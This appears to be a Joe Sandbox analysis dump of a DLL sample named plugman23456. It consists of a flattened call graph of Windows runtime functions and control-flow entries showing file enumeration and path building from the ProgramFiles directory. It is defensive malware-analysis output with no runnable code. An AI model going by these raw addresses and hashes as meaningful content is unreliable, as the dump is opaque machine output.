6734 100057fd 6731->6734 6732 100057f5 _abort 6732->6721 6733->6729 6737 100056b9 RtlLeaveCriticalSection 6734->6737 6736 10005807 6736->6732 6737->6736 6739 10005815 ___scrt_is_nonwritable_in_current_image 6738->6739 6746 10005671 RtlEnterCriticalSection 6739->6746 6741 1000581f 6742 10005a7f _abort 20 API calls 6741->6742 6743 10005832 6742->6743 6747 10005848 6743->6747 6745 10005840 _abort 
6745->6724 6746->6741 6750 100056b9 RtlLeaveCriticalSection 6747->6750 6749 10005852 6749->6745 6750->6749 6752 1000384b ___vcrt_freefls@4 6751->6752 6754 1000382d 6751->6754 6752->6678 6753 1000383b 6762 10003ba2 6753->6762 6754->6753 6757 10003b67 6754->6757 6767 10003a82 6757->6767 6759 10003b81 6760 10003b99 TlsGetValue 6759->6760 6761 10003b8d 6759->6761 6760->6761 6761->6753 6763 10003a82 try_get_function 5 API calls 6762->6763 6764 10003bbc 6763->6764 6765 10003bd7 TlsSetValue 6764->6765 6766 10003bcb 6764->6766 6765->6766 6766->6752 6768 10003aaa 6767->6768 6773 10003aa6 __crt_fast_encode_pointer 6767->6773 6768->6773 6774 100039be 6768->6774 6771 10003ac4 GetProcAddress 6772 10003ad4 __crt_fast_encode_pointer 6771->6772 6771->6773 6772->6773 6773->6759 6779 100039cd try_get_first_available_module 6774->6779 6775 10003a77 6775->6771 6775->6773 6776 100039ea LoadLibraryExW 6777 10003a05 GetLastError 6776->6777 6776->6779 6777->6779 6778 10003a60 FreeLibrary 6778->6779 6779->6775 6779->6776 6779->6778 6780 10003a38 LoadLibraryExW 6779->6780 6780->6779 6787 10003856 6781->6787 6783 100023f1 6783->6668 6784 100053da 6783->6784 6785 10005b7a __dosmaperr 20 API calls 6784->6785 6786 100023fd 6785->6786 6786->6671 6786->6672 6788 10003862 GetLastError 6787->6788 6789 1000385f 6787->6789 6790 10003b67 ___vcrt_FlsGetValue 6 API calls 6788->6790 6789->6783 6791 10003877 6790->6791 6792 100038dc SetLastError 6791->6792 6793 10003ba2 ___vcrt_FlsSetValue 6 API calls 6791->6793 6798 10003896 6791->6798 6792->6783 6794 10003890 6793->6794 6795 100038b8 6794->6795 6796 10003ba2 ___vcrt_FlsSetValue 6 API calls 6794->6796 6794->6798 6797 10003ba2 ___vcrt_FlsSetValue 6 API calls 6795->6797 6795->6798 6796->6795 6797->6798 6798->6792 6989 1000281c 6992 10002882 6989->6992 6995 10003550 6992->6995 6994 1000282a 6996 1000358a 6995->6996 6997 1000355d 6995->6997 6996->6994 6997->6996 6998 100047e5 ___std_exception_copy 21 API calls 6997->6998 6999 1000357a 6998->6999 6999->6996 
7001 1000544d 6999->7001 7002 1000545a 7001->7002 7004 10005468 7001->7004 7002->7004 7008 1000547f 7002->7008 7003 10006368 __dosmaperr 20 API calls 7005 10005470 7003->7005 7004->7003 7006 100062ac ___std_exception_copy 26 API calls 7005->7006 7007 1000547a 7006->7007 7007->6996 7008->7007 7009 10006368 __dosmaperr 20 API calls 7008->7009 7009->7005 7805 10004bdd 7806 10004c08 7805->7806 7807 10004bec 7805->7807 7809 10006d60 51 API calls 7806->7809 7807->7806 7808 10004bf2 7807->7808 7810 10006368 __dosmaperr 20 API calls 7808->7810 7811 10004c0f GetModuleFileNameA 7809->7811 7812 10004bf7 7810->7812 7813 10004c33 7811->7813 7814 100062ac ___std_exception_copy 26 API calls 7812->7814 7828 10004d01 7813->7828 7815 10004c01 7814->7815 7820 10004c72 7823 10004d01 38 API calls 7820->7823 7821 10004c66 7822 10006368 __dosmaperr 20 API calls 7821->7822 7827 10004c6b 7822->7827 7825 10004c88 7823->7825 7824 1000571e _free 20 API calls 7824->7815 7826 1000571e _free 20 API calls 7825->7826 7825->7827 7826->7827 7827->7824 7830 10004d26 7828->7830 7832 10004d86 7830->7832 7840 100070eb 7830->7840 7831 10004c50 7834 10004e76 7831->7834 7832->7831 7833 100070eb 38 API calls 7832->7833 7833->7832 7835 10004e8b 7834->7835 7836 10004c5d 7834->7836 7835->7836 7837 1000637b _abort 20 API calls 7835->7837 7836->7820 7836->7821 7838 10004eb9 7837->7838 7839 1000571e _free 20 API calls 7838->7839 7839->7836 7843 10007092 7840->7843 7844 100054a7 __fassign 38 API calls 7843->7844 7845 100070a6 7844->7845 7845->7830 5824 10006d60 5825 10006d69 5824->5825 5826 10006d72 5824->5826 5828 10006c5f 5825->5828 5848 10005af6 GetLastError 5828->5848 5830 10006c6c 5868 10006d7e 5830->5868 5832 10006c74 5877 100069f3 5832->5877 5835 10006c8b 5835->5826 5838 10006cce 5904 1000571e 5838->5904 5842 10006cc9 5901 10006368 5842->5901 5844 10006d12 5844->5838 5910 100068c9 5844->5910 5845 10006ce6 5845->5844 5846 1000571e _free 20 API calls 5845->5846 5846->5844 5849 10005b12 5848->5849 5850 
10005b0c 5848->5850 5854 10005b61 SetLastError 5849->5854 5920 1000637b 5849->5920 5913 10005e08 5850->5913 5854->5830 5855 10005b2c 5857 1000571e _free 20 API calls 5855->5857 5859 10005b32 5857->5859 5861 10005b6d SetLastError 5859->5861 5860 10005b48 5934 1000593c 5860->5934 5939 100055a8 5861->5939 5865 1000571e _free 20 API calls 5867 10005b5a 5865->5867 5867->5854 5867->5861 5869 10006d8a ___scrt_is_nonwritable_in_current_image 5868->5869 5870 10005af6 _abort 38 API calls 5869->5870 5872 10006d94 5870->5872 5873 10006e18 _abort 5872->5873 5874 100055a8 _abort 38 API calls 5872->5874 5876 1000571e _free 20 API calls 5872->5876 6318 10005671 RtlEnterCriticalSection 5872->6318 6319 10006e0f 5872->6319 5873->5832 5874->5872 5876->5872 6323 100054a7 5877->6323 5880 10006a14 GetOEMCP 5883 10006a3d 5880->5883 5881 10006a26 5882 10006a2b GetACP 5881->5882 5881->5883 5882->5883 5883->5835 5884 100056d0 5883->5884 5885 1000570e 5884->5885 5889 100056de _abort 5884->5889 5886 10006368 __dosmaperr 20 API calls 5885->5886 5888 1000570c 5886->5888 5887 100056f9 RtlAllocateHeap 5887->5888 5887->5889 5888->5838 5891 10006e20 5888->5891 5889->5885 5889->5887 5890 1000474f _abort 7 API calls 5889->5890 5890->5889 5892 100069f3 40 API calls 5891->5892 5893 10006e3f 5892->5893 5896 10006e90 IsValidCodePage 5893->5896 5898 10006e46 5893->5898 5900 10006eb5 ___scrt_fastfail 5893->5900 5894 10002ada _ValidateLocalCookies 5 API calls 5895 10006cc1 5894->5895 5895->5842 5895->5845 5897 10006ea2 GetCPInfo 5896->5897 5896->5898 5897->5898 5897->5900 5898->5894 6360 10006acb GetCPInfo 5900->6360 5902 10005b7a __dosmaperr 20 API calls 5901->5902 5903 1000636d 5902->5903 5903->5838 5905 10005752 __dosmaperr 5904->5905 5906 10005729 HeapFree 5904->5906 5905->5835 5906->5905 5907 1000573e 5906->5907 5908 10006368 __dosmaperr 18 API calls 5907->5908 5909 10005744 GetLastError 5908->5909 5909->5905 6433 10006886 5910->6433 5912 100068ed 5912->5838 5950 10005c45 5913->5950 5916 10005e47 
TlsGetValue 5917 10005e3b 5916->5917 5957 10002ada 5917->5957 5919 10005e58 5919->5849 5925 10006388 _abort 5920->5925 5921 100063c8 5924 10006368 __dosmaperr 19 API calls 5921->5924 5922 100063b3 RtlAllocateHeap 5923 10005b24 5922->5923 5922->5925 5923->5855 5927 10005e5e 5923->5927 5924->5923 5925->5921 5925->5922 5972 1000474f 5925->5972 5928 10005c45 _abort 5 API calls 5927->5928 5929 10005e85 5928->5929 5930 10005ea0 TlsSetValue 5929->5930 5931 10005e94 5929->5931 5930->5931 5932 10002ada _ValidateLocalCookies 5 API calls 5931->5932 5933 10005b41 5932->5933 5933->5855 5933->5860 5988 10005914 5934->5988 6136 10007613 5939->6136 5942 100055b8 5944 100055c2 IsProcessorFeaturePresent 5942->5944 5949 100055e0 5942->5949 5946 100055cd 5944->5946 6166 100060e2 5946->6166 6172 10004bc1 5949->6172 5951 10005c71 5950->5951 5952 10005c75 5950->5952 5951->5952 5953 10005c95 5951->5953 5964 10005ce1 5951->5964 5952->5916 5952->5917 5953->5952 5955 10005ca1 GetProcAddress 5953->5955 5956 10005cb1 __crt_fast_encode_pointer 5955->5956 5956->5952 5958 10002ae3 5957->5958 5959 10002ae5 IsProcessorFeaturePresent 5957->5959 5958->5919 5961 10002b58 5959->5961 5971 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5961->5971 5963 10002c3b 5963->5919 5965 10005d02 LoadLibraryExW 5964->5965 5969 10005cf7 5964->5969 5966 10005d37 5965->5966 5967 10005d1f GetLastError 5965->5967 5966->5969 5970 10005d4e FreeLibrary 5966->5970 5967->5966 5968 10005d2a LoadLibraryExW 5967->5968 5968->5966 5969->5951 5970->5969 5971->5963 5977 10004793 5972->5977 5974 10004765 5975 10002ada _ValidateLocalCookies 5 API calls 5974->5975 5976 1000478f 5975->5976 5976->5925 5978 1000479f ___scrt_is_nonwritable_in_current_image 5977->5978 5983 10005671 RtlEnterCriticalSection 5978->5983 5980 100047aa 5984 100047dc 5980->5984 5982 100047d1 _abort 5982->5974 5983->5980 5987 100056b9 RtlLeaveCriticalSection 5984->5987 5986 100047e3 5986->5982 5987->5986 5994 
10005854 5988->5994 5990 10005938 5991 100058c4 5990->5991 6005 10005758 5991->6005 5993 100058e8 5993->5865 5995 10005860 ___scrt_is_nonwritable_in_current_image 5994->5995 6000 10005671 RtlEnterCriticalSection 5995->6000 5997 1000586a 6001 10005890 5997->6001 5999 10005888 _abort 5999->5990 6000->5997 6004 100056b9 RtlLeaveCriticalSection 6001->6004 6003 1000589a 6003->5999 6004->6003 6006 10005764 ___scrt_is_nonwritable_in_current_image 6005->6006 6013 10005671 RtlEnterCriticalSection 6006->6013 6008 1000576e 6014 10005a7f 6008->6014 6010 10005786 6018 1000579c 6010->6018 6012 10005794 _abort 6012->5993 6013->6008 6015 10005ab5 __fassign 6014->6015 6016 10005a8e __fassign 6014->6016 6015->6010 6016->6015 6021 10007cc2 6016->6021 6135 100056b9 RtlLeaveCriticalSection 6018->6135 6020 100057a6 6020->6012 6022 10007d42 6021->6022 6025 10007cd8 6021->6025 6023 10007d90 6022->6023 6026 1000571e _free 20 API calls 6022->6026 6089 10007e35 6023->6089 6025->6022 6027 10007d0b 6025->6027 6032 1000571e _free 20 API calls 6025->6032 6028 10007d64 6026->6028 6029 10007d2d 6027->6029 6034 1000571e _free 20 API calls 6027->6034 6030 1000571e _free 20 API calls 6028->6030 6031 1000571e _free 20 API calls 6029->6031 6033 10007d77 6030->6033 6036 10007d37 6031->6036 6038 10007d00 6032->6038 6035 1000571e _free 20 API calls 6033->6035 6040 10007d22 6034->6040 6041 10007d85 6035->6041 6042 1000571e _free 20 API calls 6036->6042 6037 10007dfe 6043 1000571e _free 20 API calls 6037->6043 6049 100090ba 6038->6049 6039 10007d9e 6039->6037 6047 1000571e 20 API calls _free 6039->6047 6077 100091b8 6040->6077 6046 1000571e _free 20 API calls 6041->6046 6042->6022 6048 10007e04 6043->6048 6046->6023 6047->6039 6048->6015 6050 100090cb 6049->6050 6076 100091b4 6049->6076 6051 100090dc 6050->6051 6052 1000571e _free 20 API calls 6050->6052 6053 100090ee 6051->6053 6055 1000571e _free 20 API calls 6051->6055 6052->6051 6054 10009100 6053->6054 6056 1000571e _free 20 API calls 6053->6056 6057 
10009112 6054->6057 6058 1000571e _free 20 API calls 6054->6058 6055->6053 6056->6054 6059 10009124 6057->6059 6060 1000571e _free 20 API calls 6057->6060 6058->6057 6061 10009136 6059->6061 6063 1000571e _free 20 API calls 6059->6063 6060->6059 6062 10009148 6061->6062 6064 1000571e _free 20 API calls 6061->6064 6065 1000915a 6062->6065 6066 1000571e _free 20 API calls 6062->6066 6063->6061 6064->6062 6067 1000571e _free 20 API calls 6065->6067 6070 1000916c 6065->6070 6066->6065 6067->6070 6068 10009190 6073 100091a2 6068->6073 6074 1000571e _free 20 API calls 6068->6074 6069 1000917e 6069->6068 6072 1000571e _free 20 API calls 6069->6072 6070->6069 6071 1000571e _free 20 API calls 6070->6071 6071->6069 6072->6068 6075 1000571e _free 20 API calls 6073->6075 6073->6076 6074->6073 6075->6076 6076->6027 6078 100091c5 6077->6078 6088 1000921d 6077->6088 6079 1000571e _free 20 API calls 6078->6079 6080 100091d5 6078->6080 6079->6080 6081 100091e7 6080->6081 6082 1000571e _free 20 API calls 6080->6082 6083 100091f9 6081->6083 6085 1000571e _free 20 API calls 6081->6085 6082->6081 6084 1000920b 6083->6084 6086 1000571e _free 20 API calls 6083->6086 6087 1000571e _free 20 API calls 6084->6087 6084->6088 6085->6083 6086->6084 6087->6088 6088->6029 6090 10007e60 6089->6090 6091 10007e42 6089->6091 6090->6039 6091->6090 6095 1000925d 6091->6095 6094 1000571e _free 20 API calls 6094->6090 6096 10007e5a 6095->6096 6097 1000926e 6095->6097 6096->6094 6131 10009221 6097->6131 6100 10009221 __fassign 20 API calls 6101 10009281 6100->6101 6102 10009221 __fassign 20 API calls 6101->6102 6103 1000928c 6102->6103 6104 10009221 __fassign 20 API calls 6103->6104 6105 10009297 6104->6105 6106 10009221 __fassign 20 API calls 6105->6106 6107 100092a5 6106->6107 6108 1000571e _free 20 API calls 6107->6108 6109 100092b0 6108->6109 6110 1000571e _free 20 API calls 6109->6110 6111 100092bb 6110->6111 6112 1000571e _free 20 API calls 6111->6112 6113 100092c6 6112->6113 6114 10009221 __fassign 
20 API calls 6113->6114 6115 100092d4 6114->6115 6116 10009221 __fassign 20 API calls 6115->6116 6117 100092e2 6116->6117 6118 10009221 __fassign 20 API calls 6117->6118 6119 100092f3 6118->6119 6120 10009221 __fassign 20 API calls 6119->6120 6121 10009301 6120->6121 6122 10009221 __fassign 20 API calls 6121->6122 6123 1000930f 6122->6123 6124 1000571e _free 20 API calls 6123->6124 6125 1000931a 6124->6125 6126 1000571e _free 20 API calls 6125->6126 6127 10009325 6126->6127 6128 1000571e _free 20 API calls 6127->6128 6129 10009330 6128->6129 6130 1000571e _free 20 API calls 6129->6130 6130->6096 6132 10009258 6131->6132 6133 10009248 6131->6133 6132->6100 6133->6132 6134 1000571e _free 20 API calls 6133->6134 6134->6133 6135->6020 6175 10007581 6136->6175 6139 1000766e 6140 1000767a _abort 6139->6140 6142 100076a1 _abort 6140->6142 6146 100076a7 _abort 6140->6146 6189 10005b7a GetLastError 6140->6189 6143 100076f3 6142->6143 6142->6146 6165 100076d6 6142->6165 6144 10006368 __dosmaperr 20 API calls 6143->6144 6145 100076f8 6144->6145 6208 100062ac 6145->6208 6151 1000771f 6146->6151 6211 10005671 RtlEnterCriticalSection 6146->6211 6152 1000777e 6151->6152 6154 10007776 6151->6154 6162 100077a9 6151->6162 6212 100056b9 RtlLeaveCriticalSection 6151->6212 6152->6162 6213 10007665 6152->6213 6157 10004bc1 _abort 28 API calls 6154->6157 6157->6152 6160 10005af6 _abort 38 API calls 6163 1000780c 6160->6163 6161 10007665 _abort 38 API calls 6161->6162 6216 1000782e 6162->6216 6164 10005af6 _abort 38 API calls 6163->6164 6163->6165 6164->6165 6220 1000bdc9 6165->6220 6167 100060fe ___scrt_fastfail 6166->6167 6168 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6167->6168 6171 100061fb ___scrt_fastfail 6168->6171 6169 10002ada _ValidateLocalCookies 5 API calls 6170 10006219 6169->6170 6170->5949 6171->6169 6239 1000499b 6172->6239 6178 10007527 6175->6178 6177 100055ad 6177->5942 6177->6139 6179 10007533 
___scrt_is_nonwritable_in_current_image 6178->6179 6184 10005671 RtlEnterCriticalSection 6179->6184 6181 10007541 6185 10007575 6181->6185 6183 10007568 _abort 6183->6177 6184->6181 6188 100056b9 RtlLeaveCriticalSection 6185->6188 6187 1000757f 6187->6183 6188->6187 6190 10005b93 6189->6190 6191 10005b99 6189->6191 6192 10005e08 _abort 11 API calls 6190->6192 6193 1000637b _abort 17 API calls 6191->6193 6196 10005bf0 SetLastError 6191->6196 6192->6191 6194 10005bab 6193->6194 6195 10005bb3 6194->6195 6198 10005e5e _abort 11 API calls 6194->6198 6199 1000571e _free 17 API calls 6195->6199 6197 10005bf9 6196->6197 6197->6142 6200 10005bc8 6198->6200 6201 10005bb9 6199->6201 6200->6195 6202 10005bcf 6200->6202 6203 10005be7 SetLastError 6201->6203 6204 1000593c _abort 17 API calls 6202->6204 6203->6197 6205 10005bda 6204->6205 6206 1000571e _free 17 API calls 6205->6206 6207 10005be0 6206->6207 6207->6196 6207->6203 6223 10006231 6208->6223 6210 100062b8 6210->6165 6211->6151 6212->6154 6214 10005af6 _abort 38 API calls 6213->6214 6215 1000766a 6214->6215 6215->6161 6217 10007834 6216->6217 6218 100077fd 6216->6218 6238 100056b9 RtlLeaveCriticalSection 6217->6238 6218->6160 6218->6163 6218->6165 6221 10002ada _ValidateLocalCookies 5 API calls 6220->6221 6222 1000bdd4 6221->6222 6222->6222 6224 10005b7a __dosmaperr 20 API calls 6223->6224 6225 10006247 6224->6225 6226 100062a6 6225->6226 6229 10006255 6225->6229 6234 100062bc IsProcessorFeaturePresent 6226->6234 6228 100062ab 6230 10006231 ___std_exception_copy 26 API calls 6228->6230 6231 10002ada _ValidateLocalCookies 5 API calls 6229->6231 6232 100062b8 6230->6232 6233 1000627c 6231->6233 6232->6210 6233->6210 6235 100062c7 6234->6235 6236 100060e2 _abort 8 API calls 6235->6236 6237 100062dc GetCurrentProcess TerminateProcess 6236->6237 6237->6228 6238->6218 6240 100049a7 _abort 6239->6240 6247 100049bf 6240->6247 6261 10004af5 GetModuleHandleW 6240->6261 6244 10004a65 6278 10004aa5 6244->6278 6270 10005671 
RtlEnterCriticalSection 6247->6270 6249 10004a3c 6251 10004a54 6249->6251 6274 10004669 6249->6274 6250 100049c7 6250->6244 6250->6249 6271 1000527a 6250->6271 6257 10004669 _abort 5 API calls 6251->6257 6252 10004a82 6281 10004ab4 6252->6281 6253 10004aae 6255 1000bdc9 _abort 5 API calls 6253->6255 6260 10004ab3 6255->6260 6257->6244 6262 100049b3 6261->6262 6262->6247 6263 10004b39 GetModuleHandleExW 6262->6263 6264 10004b63 GetProcAddress 6263->6264 6265 10004b78 6263->6265 6264->6265 6266 10004b95 6265->6266 6267 10004b8c FreeLibrary 6265->6267 6268 10002ada _ValidateLocalCookies 5 API calls 6266->6268 6267->6266 6269 10004b9f 6268->6269 6269->6247 6270->6250 6289 10005132 6271->6289 6275 10004698 6274->6275 6276 10002ada _ValidateLocalCookies 5 API calls 6275->6276 6277 100046c1 6276->6277 6277->6251 6311 100056b9 RtlLeaveCriticalSection 6278->6311 6280 10004a7e 6280->6252 6280->6253 6312 10006025 6281->6312 6284 10004ae2 6287 10004b39 _abort 8 API calls 6284->6287 6285 10004ac2 GetPEB 6285->6284 6286 10004ad2 GetCurrentProcess TerminateProcess 6285->6286 6286->6284 6288 10004aea ExitProcess 6287->6288 6292 100050e1 6289->6292 6291 10005156 6291->6249 6293 100050ed ___scrt_is_nonwritable_in_current_image 6292->6293 6300 10005671 RtlEnterCriticalSection 6293->6300 6295 100050fb 6301 1000515a 6295->6301 6299 10005119 _abort 6299->6291 6300->6295 6304 10005182 6301->6304 6305 1000517a 6301->6305 6302 10002ada _ValidateLocalCookies 5 API calls 6303 10005108 6302->6303 6307 10005126 6303->6307 6304->6305 6306 1000571e _free 20 API calls 6304->6306 6305->6302 6306->6305 6310 100056b9 RtlLeaveCriticalSection 6307->6310 6309 10005130 6309->6299 6310->6309 6311->6280 6313 10006040 6312->6313 6314 1000604a 6312->6314 6316 10002ada _ValidateLocalCookies 5 API calls 6313->6316 6315 10005c45 _abort 5 API calls 6314->6315 6315->6313 6317 10004abe 6316->6317 6317->6284 6317->6285 6318->5872 6322 100056b9 RtlLeaveCriticalSection 6319->6322 6321 10006e16 6321->5872 6322->6321 
6324 100054ba 6323->6324 6325 100054c4 6323->6325 6324->5880 6324->5881 6325->6324 6326 10005af6 _abort 38 API calls 6325->6326 6327 100054e5 6326->6327 6331 10007a00 6327->6331 6332 10007a13 6331->6332 6333 100054fe 6331->6333 6332->6333 6339 10007f0f 6332->6339 6335 10007a2d 6333->6335 6336 10007a40 6335->6336 6337 10007a55 6335->6337 6336->6337 6338 10006d7e __fassign 38 API calls 6336->6338 6337->6324 6338->6337 6340 10007f1b ___scrt_is_nonwritable_in_current_image 6339->6340 6341 10005af6 _abort 38 API calls 6340->6341 6342 10007f24 6341->6342 6343 10007f72 _abort 6342->6343 6351 10005671 RtlEnterCriticalSection 6342->6351 6343->6333 6345 10007f42 6352 10007f86 6345->6352 6350 100055a8 _abort 38 API calls 6350->6343 6351->6345 6353 10007f56 6352->6353 6354 10007f94 __fassign 6352->6354 6356 10007f75 6353->6356 6354->6353 6355 10007cc2 __fassign 20 API calls 6354->6355 6355->6353 6359 100056b9 RtlLeaveCriticalSection 6356->6359 6358 10007f69 6358->6343 6358->6350 6359->6358 6361 10006baf 6360->6361 6366 10006b05 6360->6366 6363 10002ada _ValidateLocalCookies 5 API calls 6361->6363 6365 10006c5b 6363->6365 6365->5898 6370 100086e4 6366->6370 6369 10008a3e 43 API calls 6369->6361 6371 100054a7 __fassign 38 API calls 6370->6371 6373 10008704 MultiByteToWideChar 6371->6373 6374 10008742 6373->6374 6375 100087da 6373->6375 6377 100056d0 21 API calls 6374->6377 6380 10008763 ___scrt_fastfail 6374->6380 6376 10002ada _ValidateLocalCookies 5 API calls 6375->6376 6378 10006b66 6376->6378 6377->6380 6384 10008a3e 6378->6384 6379 100087d4 6389 10008801 6379->6389 6380->6379 6382 100087a8 MultiByteToWideChar 6380->6382 6382->6379 6383 100087c4 GetStringTypeW 6382->6383 6383->6379 6385 100054a7 __fassign 38 API calls 6384->6385 6386 10008a51 6385->6386 6393 10008821 6386->6393 6390 1000880d 6389->6390 6391 1000881e 6389->6391 6390->6391 6392 1000571e _free 20 API calls 6390->6392 6391->6375 6392->6391 6395 1000883c 6393->6395 6394 10008862 MultiByteToWideChar 6396 1000888c 
6394->6396 6407 10008a16 6394->6407 6395->6394 6401 100056d0 21 API calls 6396->6401 6403 100088ad 6396->6403 6397 10002ada _ValidateLocalCookies 5 API calls 6398 10006b87 6397->6398 6398->6369 6399 100088f6 MultiByteToWideChar 6400 10008962 6399->6400 6402 1000890f 6399->6402 6405 10008801 __freea 20 API calls 6400->6405 6401->6403 6420 10005f19 6402->6420 6403->6399 6403->6400 6405->6407 6407->6397 6408 10008971 6410 100056d0 21 API calls 6408->6410 6413 10008992 6408->6413 6409 10008939 6409->6400 6411 10005f19 11 API calls 6409->6411 6410->6413 6411->6400 6412 10008a07 6415 10008801 __freea 20 API calls 6412->6415 6413->6412 6414 10005f19 11 API calls 6413->6414 6416 100089e6 6414->6416 6415->6400 6416->6412 6417 100089f5 WideCharToMultiByte 6416->6417 6417->6412 6418 10008a35 6417->6418 6419 10008801 __freea 20 API calls 6418->6419 6419->6400 6421 10005c45 _abort 5 API calls 6420->6421 6422 10005f40 6421->6422 6425 10005f49 6422->6425 6428 10005fa1 6422->6428 6426 10002ada _ValidateLocalCookies 5 API calls 6425->6426 6427 10005f9b 6426->6427 6427->6400 6427->6408 6427->6409 6429 10005c45 _abort 5 API calls 6428->6429 6430 10005fc8 6429->6430 6431 10002ada _ValidateLocalCookies 5 API calls 6430->6431 6432 10005f89 LCMapStringW 6431->6432 6432->6425 6434 10006892 ___scrt_is_nonwritable_in_current_image 6433->6434 6441 10005671 RtlEnterCriticalSection 6434->6441 6436 1000689c 6442 100068f1 6436->6442 6440 100068b5 _abort 6440->5912 6441->6436 6454 10007011 6442->6454 6444 1000693f 6445 10007011 26 API calls 6444->6445 6446 1000695b 6445->6446 6447 10007011 26 API calls 6446->6447 6448 10006979 6447->6448 6449 100068a9 6448->6449 6450 1000571e _free 20 API calls 6448->6450 6451 100068bd 6449->6451 6450->6449 6468 100056b9 RtlLeaveCriticalSection 6451->6468 6453 100068c7 6453->6440 6455 10007022 6454->6455 6464 1000701e 6454->6464 6456 10007029 6455->6456 6460 1000703c ___scrt_fastfail 6455->6460 6457 10006368 __dosmaperr 20 API calls 6456->6457 6458 1000702e 
6457->6458 6459 100062ac ___std_exception_copy 26 API calls 6458->6459 6459->6464 6461 10007073 6460->6461 6462 1000706a 6460->6462 6460->6464 6461->6464 6466 10006368 __dosmaperr 20 API calls 6461->6466 6463 10006368 __dosmaperr 20 API calls 6462->6463 6465 1000706f 6463->6465 6464->6444 6467 100062ac ___std_exception_copy 26 API calls 6465->6467 6466->6465 6467->6464 6468->6453 7507 10007260 GetStartupInfoW 7508 10007286 7507->7508 7510 10007318 7507->7510 7508->7510 7513 10008be3 7508->7513 7511 100072af 7511->7510 7512 100072dd GetFileType 7511->7512 7512->7511 7514 10008bef ___scrt_is_nonwritable_in_current_image 7513->7514 7515 10008c13 7514->7515 7516 10008bfc 7514->7516 7526 10005671 RtlEnterCriticalSection 7515->7526 7517 10006368 __dosmaperr 20 API calls 7516->7517 7519 10008c01 7517->7519 7520 100062ac ___std_exception_copy 26 API calls 7519->7520 7521 10008c0b _abort 7520->7521 7521->7511 7522 10008c4b 7534 10008c72 7522->7534 7524 10008c1f 7524->7522 7527 10008b34 7524->7527 7526->7524 7528 1000637b _abort 20 API calls 7527->7528 7529 10008b46 7528->7529 7532 10005eb7 11 API calls 7529->7532 7533 10008b53 7529->7533 7530 1000571e _free 20 API calls 7531 10008ba5 7530->7531 7531->7524 7532->7529 7533->7530 7537 100056b9 RtlLeaveCriticalSection 7534->7537 7536 10008c79 7536->7521 7537->7536 7645 100081a0 7646 100081d9 7645->7646 7647 100081dd 7646->7647 7658 10008205 7646->7658 7648 10006368 __dosmaperr 20 API calls 7647->7648 7649 100081e2 7648->7649 7651 100062ac ___std_exception_copy 26 API calls 7649->7651 7650 10008529 7652 10002ada _ValidateLocalCookies 5 API calls 7650->7652 7653 100081ed 7651->7653 7654 10008536 7652->7654 7655 10002ada _ValidateLocalCookies 5 API calls 7653->7655 7657 100081f9 7655->7657 7658->7650 7659 100080c0 7658->7659 7660 100080db 7659->7660 7661 10002ada _ValidateLocalCookies 5 API calls 7660->7661 7662 10008152 7661->7662 7662->7658 7846 1000a1e0 7849 1000a1fe 7846->7849 7848 1000a1f6 7851 1000a203 7849->7851 7850 

                          Control-flow Graph

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                          • FindClose.KERNEL32(00000000), ref: 100011DB
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                          • String ID:
                          • API String ID: 1083526818-0
                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                          Control-flow Graph

                          APIs
                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                          • lstrlenW.KERNEL32(?), ref: 100014C5
                          • lstrlenW.KERNEL32(?), ref: 100014E0
                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
